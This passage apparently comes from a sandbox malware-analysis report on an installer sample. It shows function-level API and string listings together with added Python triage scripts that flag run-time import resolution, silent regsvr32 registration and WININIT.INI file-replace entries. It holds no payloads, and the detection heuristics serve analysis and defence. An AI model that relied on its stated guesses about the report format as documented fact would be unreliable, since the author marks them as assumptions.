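#   • GetFocus.USER32 ref: 0041B755                    (no argument list)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_NAME = re.compile(r"^[0-9A-Fa-f]{8}$")   # an API "name" that is really an address
ZLIB_INFLATE = {"inflateInit_", "inflate", "inflateEnd", "inflateReset"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_record(api_text: str, string_id: str = "") -> FunctionRecord:
    """Parse one function's 'APIs' bullets plus its '$'-joined 'String ID'."""
    rec = FunctionRecord()
    for line in api_text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue                      # headers, blank lines, other bullets
        args = m.group("args")
        rec.calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module").upper(),
            args=[a.strip() for a in args.split(",")] if args else [],
            ref=m.group("ref").upper(),
        ))
    rec.strings = [s for s in string_id.split("$") if s]
    return rec


def triage(rec: FunctionRecord) -> List[str]:
    """Return human-readable findings; an empty list means nothing notable."""
    findings: List[str] = []

    # 1. Decompression resolved at run time via GetProcAddress(hModule, name).
    resolved = {c.args[1] for c in rec.calls
                if c.name == "GetProcAddress" and len(c.args) >= 2}
    hit = resolved & ZLIB_INFLATE
    if len(hit) >= 2:
        findings.append("runtime-resolved zlib inflate: " + ", ".join(sorted(hit)))

    # 2. Calls the report named only by address: resolve them against the
    #    module's export table before drawing conclusions about the function.
    unresolved = sorted({c.name for c in rec.calls if HEX_NAME.match(c.name)})
    if unresolved:
        findings.append("calls named by address, export unresolved: " + ", ".join(unresolved))

    # 3. Spawn / file-replace strings seen in the records. Legitimate installers
    #    use both mechanisms as well, so these are context, not a verdict.
    if any(s.startswith("regsvr32.exe") for s in rec.strings) and any("/s" in s for s in rec.strings):
        findings.append("builds a silent regsvr32.exe /s command line")
    if "WININIT.INI" in rec.strings and "[rename]" in rec.strings:
        findings.append("writes a WININIT.INI [rename] entry (legacy boot-time file replace)")
    return findings


# Records copied from the report text above; nothing else here is real data.
ZLIB_APIS = """
• GetProcAddress.KERNEL32(02310000,inflateInit_), ref: 0045CADD
• GetProcAddress.KERNEL32(02310000,inflate), ref: 0045CAED
• GetProcAddress.KERNEL32(02310000,inflateEnd), ref: 0045CAFD
• GetProcAddress.KERNEL32(02310000,inflateReset), ref: 0045CB0D
"""
ZLIB_STRINGS = "inflate$inflateEnd$inflateInit_$inflateReset"
REGSVR_APIS = """
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457570,?, /s ",?,regsvr32.exe",?,00457570), ref: 004574E2
"""
REGSVR_STRINGS = '/s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"'
WININIT_APIS = "• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363"
WININIT_STRINGS = "(rI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]"
GDI_APIS = """
• GetFocus.USER32 ref: 0041B755
• 73A1A570.USER32(?), ref: 0041B761
• 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
"""

if __name__ == "__main__":
    for label, apis, strs in [("zlib", ZLIB_APIS, ZLIB_STRINGS), ("regsvr32", REGSVR_APIS, REGSVR_STRINGS),
                              ("wininit", WININIT_APIS, WININIT_STRINGS), ("gdi", GDI_APIS, "")]:
        print(label, triage(parse_record(apis, strs)))
```

The regsvr32 and WININIT.INI findings deliberately say nothing about intent: silent DLL registration and the `[rename]` section are standard installer behaviour, and the report's own verdict rests on the signatures listed at the top of the page, not on these two routines. The address-named calls are the item most worth following up, since the report cannot tell you what 73A24D40 or 73A18830 are until the export is resolved.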

                                                                                                                                                          APIs
                                                                                                                                                          • GetFocus.USER32 ref: 0041B755
                                                                                                                                                          • 73A1A570.USER32(?), ref: 0041B761
                                                                                                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: A18830$A122A26310A570Focus
• String ID: {H
• API String ID: 3906783838-1783425356
• Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
• Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
• Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
• Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041BA27
• 73A1A570.USER32(?), ref: 0041BA33
• 73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
• 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
• 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
• 73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: A18830$A122A26310A570Focus
• String ID: {H
• API String ID: 3906783838-1783425356
• Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
• Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
• Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
• Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004767B0: GetWindowThreadProcessId.USER32(00000000), ref: 004767B8
  • Part of subcall function 004767B0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004768AF,0049B050,00000000), ref: 004767CB
  • Part of subcall function 004767B0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1
• SendMessageA.USER32(00000000,0000004A,00000000,BlG), ref: 004768BD
• GetTickCount.KERNEL32 ref: 00476902
• GetTickCount.KERNEL32 ref: 0047690C
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00476961
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: BlG$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
• API String ID: 613034392-3388943489
• Opcode ID: 493204cbb9f30947e948617084b0342a826f55335b3a7ae31835fde674a1f57b
• Instruction ID: df859dff2162c270e2d7d1c5060a18d5d2758608ab9b0db3860dd5af44bb5bd3
• Opcode Fuzzy Hash: 493204cbb9f30947e948617084b0342a826f55335b3a7ae31835fde674a1f57b
• Instruction Fuzzy Hash: F531C4B4F006159ADB10EBB988427EEB6A59F04304F51843BF548FB382D67D4D008BAD
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044FF9C: SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00494BE5
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00494BF9
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494C13
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494C1F
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494C25
• Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494C38
Strings
• Deleting Uninstall data files., xrefs: 00494B5B
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
• String ID: Deleting Uninstall data files.
• API String ID: 1570157960-2568741658
• Opcode ID: 2f38f4aeba9c8d33851b350cccc0448d854c72f9a93701f6141f9ee4b509150d
• Instruction ID: e1fcdc77d6d78d50d68a388ab1430eaee9cd4602355dadba40cd1fe6c0376bc1
• Opcode Fuzzy Hash: 2f38f4aeba9c8d33851b350cccc0448d854c72f9a93701f6141f9ee4b509150d
• Instruction Fuzzy Hash: 1321A270314204AEEB10AB76FD86F1737A8EB9871CF11403BB5049A2E3D67C9C059B6D
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F441,?,?,?,?,00000000), ref: 0046F3AB
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F441), ref: 0046F3C2
• AddFontResourceA.GDI32(00000000), ref: 0046F3DF
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F3F3
Strings
• Failed to set value in Fonts registry key., xrefs: 0046F3B4
• AddFontResource, xrefs: 0046F3FD
• Failed to open Fonts registry key., xrefs: 0046F3C9
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
• Opcode ID: 2999f484c9fa7101e2376ab1a673f13ffbd4f0a5e4229ddd32b43e9622a974b8
• Instruction ID: f1b7769b30759bd79ce57191d192b4d330d9cf52c64851f68664acd4af899289
• Opcode Fuzzy Hash: 2999f484c9fa7101e2376ab1a673f13ffbd4f0a5e4229ddd32b43e9622a974b8
• Instruction Fuzzy Hash: 5C21B5707442047BDB10EAA6AC42B5F779CDB55708F504077B940EB3C2EA7CDD09966E
Uniqueness

Uniqueness Score: -1.00%
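The listings above (the CallSpawnServer function, the "Deleting Uninstall data files." function and the Fonts function) and the kernel32/GetFinalPathNameByHandleA listing further down show two things a triager wants surfaced quickly: run-time API resolution through GetModuleHandleA followed by GetProcAddress, and window messages and access masks that the report prints only as raw hex. The script below is an added example, not part of the report or of Joe Sandbox: it parses these bullet lines, pairs each GetModuleHandle* call with the GetProcAddress that follows it, names the message numbers (WM_COPYDATA, WM_FONTCHANGE sent to HWND_BROADCAST, a WM_USER-relative private message, TVM_SETEXTENDEDSTYLE) and decodes the OpenProcess access mask (SYNCHRONIZE only). The assumption that the resolved export name shows up as a leftover argument on the GetModuleHandleA line is mine, drawn from how these lines read, not a documented property of the report format; the sample input is copied from this report but the selection of lines is constructed.

```python
"""Triage helper for the "APIs" listings of a Joe Sandbox report (added example)."""
import re
from collections import namedtuple
from typing import List, Optional, Tuple

# Values from the Win32 headers (winuser.h, winnt.h, commctrl.h).
WM_USER = 0x0400
HWND_BROADCAST = 0xFFFF
SYNCHRONIZE = 0x00100000
MESSAGE_NAMES = {0x001D: "WM_FONTCHANGE", 0x004A: "WM_COPYDATA",
                 0x112C: "TVM_SETEXTENDEDSTYLE"}  # TV_FIRST (0x1100) + 44
MESSAGE_APIS = {"SendMessageA", "SendMessageW", "SendNotifyMessageA", "SendNotifyMessageW"}

# One listing line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(arg,arg,...), ref: XXXXXXXX; the argument list may be absent.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w{3,}$")  # token that looks like an export name

Call = namedtuple("Call", "api module args ref subcall")


def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def as_int(tok: str) -> Optional[int]:
    """Integers are printed as 8 hex digits; strings, '?' and negatives give None."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else None


def dynamic_imports(calls: List[Call]) -> List[Tuple[str, Optional[str], str]]:
    """Pair GetModuleHandle* with a GetProcAddress in the next three calls and name
    the export resolved at run time.  Assumption: the report renders stack leftovers
    as extra arguments, so the export name follows the module name on the
    GetModuleHandleA line while the GetProcAddress line shows a stale string."""
    found = []
    for i, c in enumerate(calls):
        if not c.api.startswith("GetModuleHandle") or not c.args:
            continue
        if not any(n.api.startswith("GetProcAddress") for n in calls[i + 1:i + 4]):
            continue
        export = next((a for a in c.args[1:]
                       if IDENT_RE.match(a) and not a.lower().endswith(".dll")), None)
        found.append((c.args[0], export, c.ref))
    return found


def decode_messages(calls: List[Call]) -> List[Tuple[str, str, bool, str]]:
    """Name the message behind the raw hex of Send* calls and flag HWND_BROADCAST
    targets; anything at or above WM_USER is an application-private message."""
    out = []
    for c in calls:
        if c.api not in MESSAGE_APIS or len(c.args) < 2:
            continue
        hwnd, msg = as_int(c.args[0]), as_int(c.args[1])
        if msg is None:
            continue
        if msg in MESSAGE_NAMES:
            name = MESSAGE_NAMES[msg]
        elif msg >= WM_USER:
            name = "WM_USER+0x%X" % (msg - WM_USER)
        else:
            name = "0x%04X" % msg
        out.append((c.api, name, hwnd == HWND_BROADCAST, c.ref))
    return out


def process_handle_rights(calls: List[Call]) -> List[Tuple[int, bool, str]]:
    """OpenProcess dwDesiredAccess; SYNCHRONIZE alone allows waiting, not memory access."""
    return [(as_int(c.args[0]), as_int(c.args[0]) == SYNCHRONIZE, c.ref)
            for c in calls if c.api == "OpenProcess" and c.args and as_int(c.args[0]) is not None]


# Lines copied from the listings in this report; the selection is constructed.
SAMPLE = """\
  • Part of subcall function 004767B0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004768AF,0049B050,00000000), ref: 004767CB
  • Part of subcall function 004767B0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1
• SendMessageA.USER32(00000000,0000004A,00000000,BlG), ref: 004768BD
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00494BF9
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494C13
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F3F3
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004626C6
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
• GetFocus.USER32 ref: 0041BA27
"""

if __name__ == "__main__":
    cs = parse_calls(SAMPLE)
    for mod, exp, ref in dynamic_imports(cs):
        print("run-time import %s!%s @ %s" % (mod, exp, ref))
    for api, name, bcast, ref in decode_messages(cs):
        print("%s %s%s @ %s" % (api, name, " [HWND_BROADCAST]" if bcast else "", ref))
    for access, sync_only, ref in process_handle_rights(cs):
        print("OpenProcess 0x%08X%s @ %s" % (access, " (SYNCHRONIZE only)" if sync_only else "", ref))
```

Run it against the "APIs" bullets of any function record (the whole Executed Functions section can be pasted in at once). The pairing heuristic is deliberately narrow: it only reports a GetModuleHandle* call when a GetProcAddress follows within three calls, so a module handle fetched for another purpose is not flagged, and a record where the export name does not survive as a leftover argument is reported with export None rather than a guess.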

APIs
  • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
  • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
  • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
• GetVersion.KERNEL32 ref: 00462688
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004626C6
• SHGetFileInfo.SHELL32(00462764,00000000,?,00000160,00004011), ref: 004626E3
• LoadCursorA.USER32(00000000,00007F02), ref: 00462701
• SetCursor.USER32(00000000,00000000,00007F02,00462764,00000000,?,00000160,00004011), ref: 00462707
• SetCursor.USER32(?,00462747,00007F02,00462764,00000000,?,00000160,00004011), ref: 0046273A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
• Opcode ID: bdfce88c962d93acead51d16ec639fbc6b01250f553aedacbf4178654b593b64
• Instruction ID: 6a4e252a28e1308c719c9726d886bca0e07c323248169c17b4ee411155371309
• Opcode Fuzzy Hash: bdfce88c962d93acead51d16ec639fbc6b01250f553aedacbf4178654b593b64
• Instruction Fuzzy Hash: 4E21E7707407047AE714BB798D47F9B76989B08708F5040BFB605EA1D3DABC8C1486AE
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
• GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FBE
• CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0), ref: 00476FE8
• CloseHandle.KERNEL32(00000000,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00477006
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FileHandle$AddressAttributesCloseCreateModuleProc
• String ID: GetFinalPathNameByHandleA$kernel32.dll
• API String ID: 2704155762-2318956294
• Opcode ID: b8f334fc9ba9ede3ca0d022d09803a2f6d276471e4ced67ec5e36412e52a9507
• Instruction ID: 04a5afe5644114c9e654b58a063851b3298de4fad75a38fc97de6a0c2b4846ec
• Opcode Fuzzy Hash: b8f334fc9ba9ede3ca0d022d09803a2f6d276471e4ced67ec5e36412e52a9507
• Instruction Fuzzy Hash: F0012242744B843AE52031BA4C82FFB604C8B40769F658137BB0CEA2C2E9AD9C06016E
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
• LocalFree.KERNEL32(007426A0,00000000,00401B68), ref: 00401ACF
• VirtualFree.KERNEL32(?,00000000,00008000,007426A0,00000000,00401B68), ref: 00401AEE
• LocalFree.KERNEL32(007436A0,?,00000000,00008000,007426A0,00000000,00401B68), ref: 00401B2D
• RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
• RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: t<t
• API String ID: 3782394904-2283984196
• Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
• Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
• Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
• Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,004597AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 004596F2
  • Part of subcall function 00453920: FindClose.KERNEL32(000000FF,00453A16), ref: 00453A05
Strings
• Failed to strip read-only attribute., xrefs: 004596C0
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004596CC
• Stripped read-only attribute., xrefs: 004596B4
• Failed to delete directory (%d). Will retry later., xrefs: 0045970B
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459767
• Deleting directory: %s, xrefs: 0045967B
• Failed to delete directory (%d)., xrefs: 00459788
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
• Opcode ID: 837aa2fd732afddfbdee691d697b2729c7b14edfd7e72b1b983d1cf92eaacf5a
• Instruction ID: a86c8ab60afa317b509f53e9f989c8e764947ac742467407c0eea8b2d16f96ba
• Opcode Fuzzy Hash: 837aa2fd732afddfbdee691d697b2729c7b14edfd7e72b1b983d1cf92eaacf5a
• Instruction Fuzzy Hash: B1418330A14205DBCB10EFA988012AE76E5AF4D31AF54857FBC1597393DB7C8D0D8759
Uniqueness
Uniqueness Score: -1.00%
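The per-function "APIs" and "Strings" entries in this listing have a regular shape (the call name and module, the stack-view arguments, the "ref:" address, and the "Part of subcall function" attribution for calls that belong to a callee), which makes them easy to turn into records for triage, for example to pull out the text arguments that expose a dynamically resolved import such as GetFinalPathNameByHandleA in the GetModuleHandleA/GetProcAddress entry above. The following Python is an added example written for this page, not Joe Sandbox's own code or tooling; the function and field names are its own, and the sample lines it carries are copied from the report entries above (constructed from the page, not captured from a new run).

```python
"""Parse the per-function 'APIs' and 'Strings' entries of a Joe Sandbox
execution-graph listing into structured records (example code, not Joe
Sandbox's own).  SAMPLE below is constructed from lines copied off the page.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API entry:  [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)], ref: ADDR
API_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
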